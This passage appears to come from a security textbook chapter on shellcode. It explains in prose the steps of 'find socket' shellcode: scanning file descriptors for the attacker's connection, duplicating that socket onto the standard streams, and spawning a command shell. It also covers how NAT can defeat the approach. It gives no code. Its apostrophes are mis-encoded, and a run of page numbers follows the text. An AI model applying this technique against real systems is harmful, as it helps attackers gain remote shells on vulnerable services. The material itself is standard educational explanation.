This is made easier by the attacker??™s choice of a specific outbound
port to bind to when they initiate their connection to the vulnerable service. In doing so,
our shellcode can know exactly what port number a valid socket descriptor must be connected
to, and determining the proper socket descriptor to duplicate becomes a matter
of locating the one socket descriptor that is connected to the port known to have been
used by the attackers. The steps required by find socket shellcode include the following:
1. For each of the 256 possible file descriptors, determine if the descriptor
represents a valid network connection, and if so, is the remote port the one
known to have been used by the attacker. This port number is typically hardcoded
into the shellcode.
2. Once the desired socket descriptor has been located, duplicate the socket onto
stdin, stdout, and stderr.
3. Spawn a new command shell process (which will receive/send its input/output
over the original socket).
One complication that must be taken into account is that the find socket shellcode must
know from what port the attacker??™s connection has originated. In cases where the
attacker??™s connection must pass through a NAT device, the attacker may not be able to
control the outbound port that the NATing device chooses to use, which will result in
the failure of step 1, as the attacker will not be able to encode the proper port number
into the shellcode.
Pages:
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391